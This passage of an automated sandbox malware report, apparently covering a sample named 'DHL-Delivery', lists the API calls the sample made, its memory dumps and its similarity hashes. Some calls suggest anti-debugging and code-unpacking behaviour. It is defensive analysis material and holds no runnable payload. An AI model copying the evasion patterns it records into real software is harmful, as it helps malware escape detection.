                        0x00401eb2
                        0x00401eb5
                        0x00401eb8
                        0x00401ebb
                        0x00401ebe
                        0x00401ec1
                        0x00401ec4
                        0x00401ec7
                        0x00401eca
                        0x00401ecd
                        0x00401ed0
                        0x00401ed3
                        0x00401ed6
                        0x00401ed9
                        0x00401edc
                        0x00401edf
                        0x00401ee2
                        0x00401ee5
                        0x00401ee8
                        0x00401eeb
                        0x00401eee
                        0x00401ef1
                        0x00401ef4
                        0x00401ef7
                        0x00401efa
                        0x00401efd
                        0x00401f00
                        0x00401f03
                        0x00401f06
                        0x00401f09
                        0x00401f0c
                        0x00401f0f
                        0x00401f12
                        0x00401f15
                        0x00401f18
                        0x00401f1b
                        0x00401f1e
                        0x00401f21
                        0x00401f26
                        0x00401f29
                        0x00401fa5
                        0x00401fac
                        0x00401fb4
                        0x00401fbf
                        0x00401fc2
                        0x00401fc5
                        0x00401fc9
                        0x00402133
                        0x0040214f
                        0x0040215d
                        0x0040216c
                        0x00402170
                        0x00402173
                        0x0040217e
                        0x00402191
                        0x004021a5
                        0x004021ae
                        0x004021b8
                        0x004021bb
                        0x004021be
                        0x0040232c
                        0x0040235f
                        0x00402390
                        0x00402393
                        0x00402399
                        0x0040239d
                        0x004023a9
                        0x004023ad
                        0x004023b4
                        0x004023cc
                        0x004023f1
                        0x004023fe
                        0x0040240a
                        0x0040241b
                        0x0040241f
                        0x00402434
                        0x00402438
                        0x0040244d
                        0x00402451
                        0x00402454
                        0x00402454
                        0x0040245d
                        0x00402476
                        0x00402488

                        APIs
                        • VirtualAlloc.KERNELBASE(?,00010000,00001000,00000040,00000000), ref: 0040232C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1737661283.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1737628367.0000000000400000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737748460.0000000000412000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.1737789454.0000000000413000.00000002.00020000.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 9f8de5d5f1f02b9313bd9b5146572e92b22ade5d0cf7224343f7f09d3e654ed8
                        • Instruction ID: 5aabb05f423539dab395de73a852fe8dc535884a1ffbbd11929aea0487438cca
                        • Opcode Fuzzy Hash: 9f8de5d5f1f02b9313bd9b5146572e92b22ade5d0cf7224343f7f09d3e654ed8
                        • Instruction Fuzzy Hash: 99E14EDFE11A1207F7452939FE693DB1ADAC7B07ABE1B46354E0966ECBE02E4B060140
                        Uniqueness

                        Uniqueness Score: 0.00%

                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2087c6a27e63b7fa2e0fd4dedd4201ee036ef35a3c1191686c63dea260606c1b
                        • Instruction ID: cc40ddd793138a96ec30f43936b04269620f5c13404d58045378c651206c4242
                        • Opcode Fuzzy Hash: 2087c6a27e63b7fa2e0fd4dedd4201ee036ef35a3c1191686c63dea260606c1b
                        • Instruction Fuzzy Hash: 39415A6DBC0306ADEF3539684DB47EB1563AF92BA0FE64429EC8683044E73684C9C602
                        Uniqueness

                        Uniqueness Score: 0.00%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                          • Part of subcall function 021A56B7: LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeLibraryLoadThunk
                        • String ID:
                        • API String ID: 3353482560-0
                        • Opcode ID: 5201f542a8efe7484820d177c67ea4cfba295046895727fcacf70b4860d4b826
                        • Instruction ID: bbac550384b9df06550a0de181c08787f178fe8ba4c39c90a48e906f1cf5296a
                        • Opcode Fuzzy Hash: 5201f542a8efe7484820d177c67ea4cfba295046895727fcacf70b4860d4b826
                        • Instruction Fuzzy Hash: 61418D6CAC5309FEEF352A684D397FA26579F03BA0F914125EC8653045E37689C6CA02
                        Uniqueness

                        Uniqueness Score: 0.01%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: bdffd04b28d37e68753dca6142abdaddb8506ccf0b48bbaf58a95415940fa583
                        • Instruction ID: 91a18461561e07441a97340ba5bd656eb264b84ba4c9cd383fa36f5627b3311c
                        • Opcode Fuzzy Hash: bdffd04b28d37e68753dca6142abdaddb8506ccf0b48bbaf58a95415940fa583
                        • Instruction Fuzzy Hash: 4241B16CBC5302DEDF38197888B47EA22979F06760F96457ADCA7C7189E321C4C4CB02
                        Uniqueness

                        Uniqueness Score: 0.01%

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeLibraryLoadThunk
                        • String ID:
                        • API String ID: 3353482560-0
                        • Opcode ID: cf000c050a4f2df0128dbdcb66a8ae6a919d5dbcd7d3e60f0c067e714a1caed2
                        • Instruction ID: ac652cc36cefac49bfa952468d3f2aa44a93a5b27c46a4786084793bd32f2287
                        • Opcode Fuzzy Hash: cf000c050a4f2df0128dbdcb66a8ae6a919d5dbcd7d3e60f0c067e714a1caed2
                        • Instruction Fuzzy Hash: 70419C7568A3D6CEC721DE7488B53D63BA3AF62540FC4409DC8828B196C7328606CBA7
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeLibraryLoadThunk
                        • String ID:
                        • API String ID: 3353482560-0
                        • Opcode ID: 4451e7636b46aa55112edc068250cde81bba1f9ac0e5bcd80e20442841d2fb9d
                        • Instruction ID: 9e31d21bfac63bcc3027b39a768e6db47666a8c8bffd44797c16511ddc0e2de3
                        • Opcode Fuzzy Hash: 4451e7636b46aa55112edc068250cde81bba1f9ac0e5bcd80e20442841d2fb9d
                        • Instruction Fuzzy Hash: 3C419E7568A3E2CEC721DE7488A53C67B63EF52550F94409DC9428B256C733860ACBA7
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: bde57db9f0a9bc992c43f48756e2222a6bef3231cfa6e744d61b792bc6ad90ae
                        • Instruction ID: 87896e15059329c16d82fa32c72f3915fd727bd832cf7c13252c8250d5480fc7
                        • Opcode Fuzzy Hash: bde57db9f0a9bc992c43f48756e2222a6bef3231cfa6e744d61b792bc6ad90ae
                        • Instruction Fuzzy Hash: A0315C6DBC1307DDDF38297499F47EB2297AF066B0F960136DCA5D3140E32484C9CA52
                        Uniqueness

                        Uniqueness Score: 0.01%

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeLibraryLoadThunk
                        • String ID:
                        • API String ID: 3353482560-0
                        • Opcode ID: 10a81690a2a93da1ee259b104a22b91fac218c4d56b24a85e0764797e200ef32
                        • Instruction ID: 5819f9b9baadc223e361ace1c917d8b83d0fa928dabde225d7e190203f868379
                        • Opcode Fuzzy Hash: 10a81690a2a93da1ee259b104a22b91fac218c4d56b24a85e0764797e200ef32
                        • Instruction Fuzzy Hash: 8E318A7968A3E28EC321DE7488A53C67B63EF62540F5480DDC5418B257D773860ACBE7
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: c8515d2c0b1b679f0155be16304bd91dd9fd1be2809e3ad0bb0af0806977a165
                        • Instruction ID: 02e3fd5c4db692a25110f729da1ac9b436bafa92556c4a875725525fdc17d84b
                        • Opcode Fuzzy Hash: c8515d2c0b1b679f0155be16304bd91dd9fd1be2809e3ad0bb0af0806977a165
                        • Instruction Fuzzy Hash: 4A21388CBC9306ACEE3525B81DB97FF05479F42BB4FE2412AECC2D3145E765848A8913
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c6562dccd52fd28bdf4232b204b14b0f6b0552e10a59ba67d52c3b17865c9b90
                        • Instruction ID: 53a45c7b2b2a5fdb47241f5d4d68286677f758807ac7486323bfa9a2a615c935
                        • Opcode Fuzzy Hash: c6562dccd52fd28bdf4232b204b14b0f6b0552e10a59ba67d52c3b17865c9b90
                        • Instruction Fuzzy Hash: 45214B8CBC5305ADEF34297859B93FF11979F46A70FA64526DC9293141E32584C58A03
                        Uniqueness

                        Uniqueness Score: 0.00%

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeLibraryLoadThunk
                        • String ID:
                        • API String ID: 3353482560-0
                        • Opcode ID: 7fed5e76d5a3cb538801e937b719218e2ff2c43c92633a62c6fdc862d979cf4a
                        • Instruction ID: 76d5ac73e5da5fcec43ddff3a60c614a27123b1e4bd3824eae02ad90690a9f49
                        • Opcode Fuzzy Hash: 7fed5e76d5a3cb538801e937b719218e2ff2c43c92633a62c6fdc862d979cf4a
                        • Instruction Fuzzy Hash: 7B319B7A68E3E38EC312DA7588A53C67B62EF52540B5480DDC1418B267D773C606C7E7
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: c95e1c14848067f7c89da75c301d8b7a7665f64de7c72d8d8604c762a0e69c20
                        • Instruction ID: 3de00dad7c85702870ac292742053c4b825098b3fd5cd01a8ed96dd5bc365d35
                        • Opcode Fuzzy Hash: c95e1c14848067f7c89da75c301d8b7a7665f64de7c72d8d8604c762a0e69c20
                        • Instruction Fuzzy Hash: AF2125766DF3F28EC312DA75849A2C17B62EE1294075840EDD142CB263D7A6870AC7F7
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 5cd2395d784b93e6b6895aa7fe6dfe949cb8ab6166aceb43f76fc60858ee42bc
                        • Instruction ID: 2210fa230cd5ced10e48bf1158b82fde0a6bef12c370d3c75f358915a2c33fb6
                        • Opcode Fuzzy Hash: 5cd2395d784b93e6b6895aa7fe6dfe949cb8ab6166aceb43f76fc60858ee42bc
                        • Instruction Fuzzy Hash: 512136762DF3E34DC312DA75889A1C27B62ED1294074840EDC142CB1A3D762870AC7E7
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 1dd17203f723ae8bd65ef113f4b6b4c6486ba1d1141ce023f008020c613787be
                        • Instruction ID: 89a320afdf40a6e0b725778a386b23b1326a594895dcb29d53213e7cbdc9b931
                        • Opcode Fuzzy Hash: 1dd17203f723ae8bd65ef113f4b6b4c6486ba1d1141ce023f008020c613787be
                        • Instruction Fuzzy Hash: E82126766DF3E38DC312DA75849A2C27F62ED1294074840DDC1428B263D767870AC7E7
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 904595a497ed3804b388bfd0c157ba66305071f9386e5124cffed27f521cab6a
                        • Instruction ID: acc97feb672401ab2fce7060c23468da2128c01121f434e57aaf7f971f561ce7
                        • Opcode Fuzzy Hash: 904595a497ed3804b388bfd0c157ba66305071f9386e5124cffed27f521cab6a
                        • Instruction Fuzzy Hash: 57115B8DAC5306BCDF3835B81AB87FF15478F06A70FA2052AEC82D3105F36584C88913
                        Uniqueness

                        Uniqueness Score: 0.01%

                        APIs
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        Uniqueness

                        Uniqueness Score: 0.01%

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationProcessTerminateThread
                        • String ID:
                        • API String ID: 1477408370-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • EnumWindows.USER32(021A0882,?,00000000), ref: 021A082D
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: EnumInformationThreadWindows
                        • String ID:
                        • API String ID: 1954852945-0
                        Uniqueness

                        Uniqueness Score: 16.53%

                        APIs
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadThread
                        • String ID:
                        • API String ID: 543350213-0
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        • EnumWindows.USER32(021A0882,?,00000000), ref: 021A082D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: EnumWindows
                        • String ID:
                        • API String ID: 1129996299-0
                        Uniqueness

                        Uniqueness Score: 0.21%

                        APIs
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ProcessTerminate
                        • String ID:
                        • API String ID: 560597551-0
                        Uniqueness

                        Uniqueness Score: 0.04%

                        APIs
                        • LdrInitializeThunk.NTDLL(?,?,?,021A1D36,00000000,?,00000000,00000000,00000025,00000303,?,021A546D,?,?,?), ref: 021A65AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        Uniqueness

                        Uniqueness Score: 0.02%

                        APIs
                        • CreateFileA.KERNELBASE(?,80000000,00000001,00000003,00000000,00000000,021A52B1,021A53FC,021A0AE6,?,?,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A53C7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        Uniqueness

                        Uniqueness Score: 0.01%

                        APIs
                        • CreateFileA.KERNELBASE(?,80000000,00000001,00000003,00000000,00000000,021A52B1,021A53FC,021A0AE6,?,?,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A53C7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        Uniqueness

                        Uniqueness Score: 0.01%

                        APIs
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ProcessTerminate
                        • String ID:
                        • API String ID: 560597551-0
                        Uniqueness

                        Uniqueness Score: 0.04%

                        APIs
                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000,?,00003000,00000004,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A4C75
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: ProcessTerminate
                        • String ID:
                        • API String ID: 560597551-0
                        Uniqueness

                        Uniqueness Score: 0.04%

                        APIs
                        • CreateFileA.KERNELBASE(?,80000000,00000001,00000003,00000000,00000000,021A52B1,021A53FC,021A0AE6,?,?,00000087,00000040,021A0A1C,00000000,00000000), ref: 021A53C7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: CreateFile
                        • String ID:
                        • API String ID: 823142352-0
                        Uniqueness

                        Uniqueness Score: 0.01%

                        Non-executed Functions

                        APIs
                          • Part of subcall function 021A83AC: LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                          • Part of subcall function 021AA407: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021A9C94,00000040,021A0A1C,00000000,00000000,00000000,00000000,?,00000000,00000000,021A841B), ref: 021AA423
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                        • String ID: "Bp0$"Bp0$nTAz
                        • API String ID: 449006233-2565102045
                        Uniqueness

                        Uniqueness Score: 100.00%

                        APIs
                          • Part of subcall function 021AA407: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,021A9C94,00000040,021A0A1C,00000000,00000000,00000000,00000000,?,00000000,00000000,021A841B), ref: 021AA423
                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,?,00000000,00000000,5FBFF0FB,6DDB9555,?,?,00000087,00000040,021A0A1C), ref: 021A0ABB
                        • LoadLibraryA.KERNELBASE(?,082962C8,000000A4,021A0953,00000000), ref: 021A84E2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1739269680.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_21a0000_DHL-Delivery.jbxd
                        Similarity
                        • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
